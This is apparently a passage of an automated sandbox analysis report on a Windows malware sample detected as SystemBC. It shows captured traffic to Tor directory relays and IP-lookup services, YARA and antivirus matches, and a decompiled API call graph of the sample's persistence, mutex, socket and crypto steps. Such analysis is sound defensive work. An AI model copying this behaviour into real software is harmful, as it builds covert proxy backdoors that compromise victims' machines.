                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          8192.168.2.349705151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:19.929457903 CET2667OUTGET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:19.979815006 CET2669INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:19 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:19 GMT
                          Data Raw: 72 6f 75 74 65 72 20 56 54 49 53 75 70 70 6f 72 74 31 20 38 32 2e 32 32 31 2e 31 32 38 2e 32 32 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 63 41 65 4b 56 6f 6e 46 6a 46 34 4d 5a 61 78 51 59 7a 41 4b 78 32 61 31 6e 52 72 6c 2f 2f 50 43 62 49 41 45 71 42 63 55 76 52 49 37 31 41 51 41 67 42 41 42 45 6d 62 45 76 0a 68 78 37 44 65 35 4e 47 36 6d 54 4c 69 66 46 57 36 2b 63 53 64 59 48 76 69 51 6b 79 64 2b 56 75 76 65 6f 4e 6d 57 6a 4d 42 34 2b 33 57 34 54 4b 64 38 77 52 6f 37 32 6b 49 34 4c 76 4b 45 73 52 0a 42 6c 35 32 32 2f 66 79 4a 52 42 46 4c 64 36 49 76 79 4e 48 53 7a 38 75 4e 63 79 4b 38 62 6b 37 74 48 39 32 65 52 78 38 78 37 35 67 36 54 70 68 56 41 31 45 45 61 71 6f 51 41 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 52 4a 6d 78 4c 34 63 65 77 33 75 54 52 75 70 6b 79 34 6e 78 56 75 76 6e 45 6e 57 42 37 34 6b 4a 4d 6e 66 6c 62 72 33 71 44 5a 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 35 3a 33 33 3a 31 32 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 41 20 32 38 44 38 20 42 39 39 38 20 30 43 43 44 20 39 41 42 38 20 33 30 44 33 20 30 30 36 42 20 42 36 39 38 20 43 45 39 39 20 42 32 30 44 0a 75 70 74 69 6d 65 20 35 31 38 34 35 32 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 30 33 30 34 36 37 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 34 33 33 45 43 43 39 42 34 30 37 36 46 36 31 44 45 30 42 43 37 35 37 44 44 31 39 41 44 45 36 31 35 42 30 38 33 38 30 46 20 6d 49 2f 58 7a 37 50 78 4f 37 69 39 6a 67 63 64 74 75 53 6b 67 31 51 66 4b 38 48 47 67 53 6f 43 70 72 36 2b 33 52 37 54 38 64 67 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 64 6d 52 4b 67 59 74 61 4d 46 5a 49 70 6d 44 59 53 49 67 5a 2f 72 63 35 44 62 31 53 55 65 4d 73 47 6a 79 39 63 32 56 35 5a 62 4a 36 4a 64 7a 63 5a 32 36 4f 41 79 0a 58 4f 6a 31 50 52 2b 6b 68 75 54 74 4c 61 38 4a 52 78 30 4f 42 4c 35 74 7a 57 59 42 6f 59 6d 49 38 66 76 47 57 71 6f 46 50 71 67 6b 57 6a 59 48 51 69 7a 44 61 5a 34 79 55 4b 2f 6f 4f 35 37 4a 0a 73 63 62 70 4c 6f 72 36 4f 7a 37 4c 47 6d 63 44 75 33 66 68 33 34 41 54 2f 34 59 5a 68 73 5a 58 72 33 64 4c 6e 4a 62 32 34 72 6b 49 48 31 39 51 4c 67 4f 6c 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 4c 33 2b 74
                          Data Ascii: router VTISupport1 82.221.128.220 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZcAeKVonFjF4MZaxQYzAKx2a1nRrl//PCbIAEqBcUvRI71AQAgBABEmbEvhx7De5NG6mTLifFW6+cSdYHviQkyd+VuveoNmWjMB4+3W4TKd8wRo72kI4LvKEsRBl522/fyJRBFLd6IvyNHSz8uNcyK8bk7tH92eRx8x75g6TphVA1EEaqoQAc=-----END ED25519 CERT-----master-key-ed25519 RJmxL4cew3uTRupky4nxVuvnEnWB74kJMnflbr3qDZkplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 15:33:12fingerprint 38CA 28D8 B998 0CCD 9AB8 30D3 006B B698 CE99 B20Duptime 518452bandwidth 1073741824 1073741824 40304672extra-info-digest 433ECC9B4076F61DE0BC757DD19ADE615B08380F mI/Xz7PxO7i9jgcdtuSkg1QfK8HGgSoCpr6+3R7T8dgonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANdmRKgYtaMFZIpmDYSIgZ/rc5Db1SUeMsGjy9c2V5ZbJ6JdzcZ26OAyXOj1PR+khuTtLa8JRx0OBL5tzWYBoYmI8fvGWqoFPqgkWjYHQizDaZ4yUK/oO57JscbpLor6Oz7LGmcDu3fh34AT/4YZhsZXr3dLnJb24rkIH19QLgOlAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKL3+t


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          9192.168.2.349706151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:21.735426903 CET2676OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:21.791101933 CET2677INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:21 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:21 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.34969164.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          2022-12-11 08:25:05 UTC0OUTGET / HTTP/1.0
                          Host: api.ipify.org
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          2022-12-11 08:25:06 UTC0INHTTP/1.0 200 OK
                          Content-Length: 11
                          Content-Type: text/plain
                          Date: Sun, 11 Dec 2022 08:25:06 GMT
                          Vary: Origin
                          2022-12-11 08:25:06 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 35 31
                          Data Ascii: 84.17.52.51


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.34971864.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          2022-12-11 08:25:52 UTC0OUTGET / HTTP/1.0
                          Host: api.ipify.org
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          2022-12-11 08:25:53 UTC0INHTTP/1.0 200 OK
                          Content-Length: 11
                          Content-Type: text/plain
                          Date: Sun, 11 Dec 2022 08:25:53 GMT
                          Vary: Origin
                          2022-12-11 08:25:53 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 35 31
                          Data Ascii: 84.17.52.51


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.34973764.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          2022-12-11 08:26:39 UTC0OUTGET / HTTP/1.0
                          Host: api.ipify.org
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          2022-12-11 08:26:40 UTC0INHTTP/1.0 200 OK
                          Content-Length: 11
                          Content-Type: text/plain
                          Date: Sun, 11 Dec 2022 08:26:39 GMT
                          Vary: Origin
                          2022-12-11 08:26:40 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 35 31
                          Data Ascii: 84.17.52.51


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.34975723.128.64.141443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          2022-12-11 08:26:57 UTC0OUTGET / HTTP/1.0
                          Host: ip4.seeip.org
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          2022-12-11 08:26:57 UTC0INHTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 11 Dec 2022 08:26:57 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          strict-transport-security: max-age=31536000; includeSubDomains
                          2022-12-11 08:26:57 UTC1INData Raw: 38 34 2e 31 37 2e 35 32 2e 35 31
                          Data Ascii: 84.17.52.51


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:09:24:58
                          Start date:11/12/2022
                          Path:C:\Users\user\Desktop\p9CvI6kq7d.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\p9CvI6kq7d.exe
                          Imagebase:0x400000
                          File size:111104 bytes
                          MD5 hash:0F6F452EE406B3360E39819AAC42A200
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.245017062.0000000000546000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low

                          Target ID:1
                          Start time:09:25:01
                          Start date:11/12/2022
                          Path:C:\ProgramData\prfxiau\orvsmwx.exe
                          Wow64 process (32bit):true
                          Commandline:C:\ProgramData\prfxiau\orvsmwx.exe start
                          Imagebase:0x400000
                          File size:111104 bytes
                          MD5 hash:0F6F452EE406B3360E39819AAC42A200
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SystemBC, Description: Yara detected SystemBC, Source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 88%, ReversingLabs
                          Reputation:low

                          Reset < >

                            Execution Graph

                            Execution Coverage:6.2%
                            Dynamic/Decrypted Code Coverage:40.4%
                            Signature Coverage:31.9%
                            Total number of Nodes:1165
                            Total number of Limit Nodes:10
                            execution_graph 6226 401000 6248 4066d2 6226->6248 6228 401019 CreateThread GetModuleFileNameA 6249 40629b 6228->6249 6782 406004 6228->6782 6230 40104d 6231 401057 GetPEB 6230->6231 6233 40106c 6230->6233 6231->6233 6232 401094 OpenMutexA CreateMutexA 6234 4010c2 6232->6234 6235 4010d4 EnumWindows Sleep 6232->6235 6233->6232 6236 401159 Sleep 6234->6236 6237 4010cf 6234->6237 6241 4010f6 6234->6241 6254 4061e1 GetCurrentProcess OpenProcessToken 6235->6254 6770 405db5 6235->6770 6239 406fe5 ExitProcess 6236->6239 6296 40490e 6237->6296 6262 405c22 6241->6262 6244 401104 GetModuleFileNameA 6276 405d44 GetEnvironmentVariableA 6244->6276 6246 401128 CopyFileA 6280 405832 6246->6280 6248->6228 6303 4066d2 6249->6303 6251 4062b7 GetCommandLineW 6252 4062c0 CommandLineToArgvW 6251->6252 6253 4062d4 6251->6253 6252->6253 6253->6230 6255 406293 6254->6255 6256 406213 LocalAlloc GetTokenInformation 6254->6256 6255->6234 6257 406263 6256->6257 6258 40623a LocalFree LocalAlloc GetTokenInformation 6256->6258 6259 406283 LocalFree CloseHandle 6257->6259 6260 406267 GetSidSubAuthority 6257->6260 6258->6257 6259->6255 6260->6259 6261 406277 6260->6261 6261->6259 6263 405c3e 6262->6263 6264 405c4f CreateToolhelp32Snapshot 6263->6264 6265 405c64 6264->6265 6266 401100 6264->6266 6304 406df2 6265->6304 6266->6236 6266->6244 6268 405c93 6308 406ee2 6268->6308 6271 405d2f CloseHandle 6271->6266 6272 405cfa 6272->6271 6273 406df2 GetPEB 6274 405ca5 6273->6274 6274->6271 6274->6272 6274->6273 6275 406ee2 GetPEB 6274->6275 6275->6274 6277 405d6c 6276->6277 6278 405d7d CreateDirectoryA 6277->6278 6279 405d95 6278->6279 6279->6246 6281 40584d 6280->6281 6314 405b81 6281->6314 6283 405864 CoInitialize 6284 40587e 6283->6284 6285 405891 CoCreateInstance 6284->6285 6286 405b75 CoUninitialize 6285->6286 6287 4058b5 6285->6287 6286->6236 6288 4061e1 10 API calls 6287->6288 6295 405a4a 6287->6295 6289 40592e 6288->6289 6290 40593f GetUserNameExW 6289->6290 6291 40593c 6289->6291 6290->6291 6292 4059f4 GetLocalTime SystemTimeToFileTime 6291->6292 6291->6295 6293 405a23 FileTimeToSystemTime 6292->6293 6294 405a1e 6292->6294 6293->6295 6294->6293 6295->6286 6322 4066d2 6296->6322 6298 404927 Sleep WSAStartup 6298->6298 6299 404946 6298->6299 6301 40499a InitSecurityInterfaceA 6299->6301 6302 404a04 Sleep 6299->6302 6323 404e45 6299->6323 6301->6299 6302->6299 6303->6251 6305 406e0e 6304->6305 6306 406e1f GetPEB 6305->6306 6307 406e34 6306->6307 6307->6268 6309 406efe 6308->6309 6310 405c9e Process32First 6309->6310 6311 406df2 GetPEB 6309->6311 6310->6274 6312 406fcd 6311->6312 6313 406ee2 GetPEB 6312->6313 6313->6310 6321 4066d2 6314->6321 6316 405b9d CoInitialize 6317 405bb7 6316->6317 6318 405bca CoCreateInstance 6317->6318 6319 405c16 CoUninitialize 6318->6319 6320 405bea 6318->6320 6319->6283 6320->6319 6321->6316 6322->6298 6387 4066d2 6323->6387 6325 404e61 CreateEventA 6326 404e98 VirtualAlloc 6325->6326 6327 404e7a VirtualAlloc 6325->6327 6329 405154 6326->6329 6330 404eb3 GetUserNameExA 6326->6330 6328 404e95 6327->6328 6327->6329 6328->6326 6540 406517 6329->6540 6332 404f87 6330->6332 6338 404ed5 6330->6338 6475 402765 6332->6475 6336 404f7d 6336->6329 6339 404fa3 WSAIoctl 6336->6339 6340 404f43 6338->6340 6354 404f1f 6338->6354 6388 4028b6 6338->6388 6342 405007 6339->6342 6392 4048e1 6340->6392 6341 4057b1 6550 406474 6341->6550 6491 40615c 6342->6491 6344 406df2 GetPEB 6349 4057a6 6344->6349 6348 404f4f 6395 401168 6348->6395 6353 406ee2 GetPEB 6349->6353 6353->6341 6358 404f2b inet_addr 6354->6358 6358->6340 6359 4048e1 VirtualFree 6360 405802 6359->6360 6361 4048e1 VirtualFree 6360->6361 6362 40580b 6361->6362 6364 405825 6362->6364 6366 405b81 3 API calls 6362->6366 6363 405045 6502 406381 6363->6502 6364->6299 6367 40581e ExitProcess 6366->6367 6368 4050b1 select 6368->6329 6386 405083 6368->6386 6369 406420 17 API calls 6369->6386 6370 405587 VirtualAlloc 6370->6329 6370->6386 6372 4028b6 72 API calls 6372->6386 6373 405644 socket 6375 40564f setsockopt CreateThread 6373->6375 6374 405637 socket 6374->6375 6375->6386 6376 4048e1 VirtualFree 6376->6386 6377 406381 11 API calls 6377->6386 6378 405473 GetTempPathA 6378->6386 6385 405832 20 API calls 6385->6386 6386->6329 6386->6368 6386->6369 6386->6370 6386->6372 6386->6373 6386->6374 6386->6376 6386->6377 6386->6378 6386->6385 6508 406b85 6386->6508 6512 406cb8 6386->6512 6517 406b34 6386->6517 6522 406d2c 6386->6522 6526 406aa4 6386->6526 6532 4062fa 6386->6532 6387->6325 6389 4028d2 6388->6389 6390 402a08 6389->6390 6558 402d52 6389->6558 6390->6338 6393 404907 6392->6393 6394 4048ef VirtualFree 6392->6394 6393->6348 6394->6393 6685 4066d2 6395->6685 6397 401184 CryptAcquireContextA 6398 406df2 GetPEB 6397->6398 6399 4011b4 6398->6399 6400 406ee2 GetPEB 6399->6400 6401 4011bf 6400->6401 6402 406df2 GetPEB 6401->6402 6403 4011da 6402->6403 6404 406ee2 GetPEB 6403->6404 6405 4011e5 6404->6405 6406 406df2 GetPEB 6405->6406 6407 401200 6406->6407 6408 406ee2 GetPEB 6407->6408 6409 40120b 6408->6409 6410 406df2 GetPEB 6409->6410 6411 40122c 6410->6411 6412 406ee2 GetPEB 6411->6412 6428 401237 6412->6428 6413 406517 GetPEB 6414 402679 6413->6414 6416 4064d6 GetPEB 6414->6416 6417 4026b0 CryptReleaseContext 6416->6417 6418 4026c3 6417->6418 6419 4026dd 6417->6419 6421 406df2 GetPEB 6418->6421 6420 406df2 GetPEB 6419->6420 6422 4026ee 6420->6422 6423 4026d2 6421->6423 6424 406ee2 GetPEB 6422->6424 6425 406ee2 GetPEB 6423->6425 6426 4026f9 6424->6426 6425->6419 6427 406df2 GetPEB 6426->6427 6429 40270a 6427->6429 6454 4013ee 6428->6454 6463 401d01 6428->6463 6686 402a45 6428->6686 6430 406ee2 GetPEB 6429->6430 6431 402715 6430->6431 6432 4048e1 VirtualFree 6431->6432 6433 402734 6432->6433 6434 4048e1 VirtualFree 6433->6434 6435 402740 6434->6435 6436 4048e1 VirtualFree 6435->6436 6437 40274c 6436->6437 6438 4048e1 VirtualFree 6437->6438 6439 402758 6438->6439 6439->6336 6440 403422 39 API calls 6440->6454 6441 4014f1 CryptStringToBinaryA 6703 4048b6 6441->6703 6444 406474 4 API calls 6444->6454 6445 40332e GetPEB 6445->6454 6446 401524 CryptStringToBinaryA 6446->6454 6447 4048b6 VirtualAlloc VirtualFree 6447->6454 6448 404484 8 API calls 6448->6454 6449 403779 8 API calls 6449->6454 6450 4024ea select 6450->6454 6451 4016aa inet_addr 6451->6454 6452 401e6f CryptStringToBinaryA CryptStringToBinaryA 6452->6454 6453 4016cd 